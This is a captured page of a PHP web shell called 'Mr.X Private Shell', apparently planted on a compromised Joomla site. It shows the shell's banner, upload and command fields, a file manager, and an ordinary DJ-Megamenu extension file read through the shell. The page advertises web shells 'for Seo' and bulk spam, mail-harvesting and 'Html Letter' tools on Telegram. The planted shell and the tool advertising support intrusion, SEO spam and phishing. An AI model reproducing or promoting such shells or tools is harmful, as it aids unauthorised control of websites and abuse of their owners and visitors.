__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php
/**
 * @package DJ-Megamenu
 * @copyright Copyright (C) DJ-Extensions.com, All rights reserved.
 * @license http://www.gnu.org/licenses GNU/GPL
 * @author url: http://dj-extensions.com
 * @author email [email protected]
 * @developer Szymon Woronowski, Artur Kaczmarek
 *
 */

defined('_JEXEC') or die();
defined('JPATH_BASE') or die;
defined('DS') or define('DS', DIRECTORY_SEPARATOR);

jimport('joomla.html.html');
jimport('joomla.form.formfield');

class JFormFieldDJMobilebutton extends JFormFieldText {
	
	protected $type = 'DJMobilebutton';
	
	protected function getInput()
	{
		$app = JFactory::getApplication();
		
		$attr = 'readonly="true"';
		$attr.= ' onclick="this.select();"';
		$attr.= ' style="cursor: pointer;"';
		$attr .= $this->element['class'] ? ' class="'.(string) $this->element['class'].'"' : '';
		
		$moduleid = $app->input->get('id');
		$value = '';
		
		if($moduleid) {
			$value = '<div id="dj-megamenu'.$moduleid.'mobileWrap"></div>';
		} else {
			$attr .= ' placeholder="'.JText::_('MOD_DJMEGAMENU_MOBILE_MENU_WRAPPER_PLACEHOLDER').'"';
		}
				
		$html = '<input type="text" id="' . $this->id . '"' . ' value="'. htmlspecialchars($value, ENT_COMPAT, 'UTF-8') .'" ' . $attr . ' />';
		
		return ($html);
		
	}
}
?>

Filemanager

Name Type Size Permission Actions
djcolor.php File 8.29 KB 0664
djfolderlist.php File 5.63 KB 0664
djmobilebutton.php File 1.28 KB 0664
djmodules.php File 1.53 KB 0664
djonlypro.php File 1.32 KB 0664
djspacer.php File 2.99 KB 0664
djupdater.php File 9.18 KB 0664
Filemanager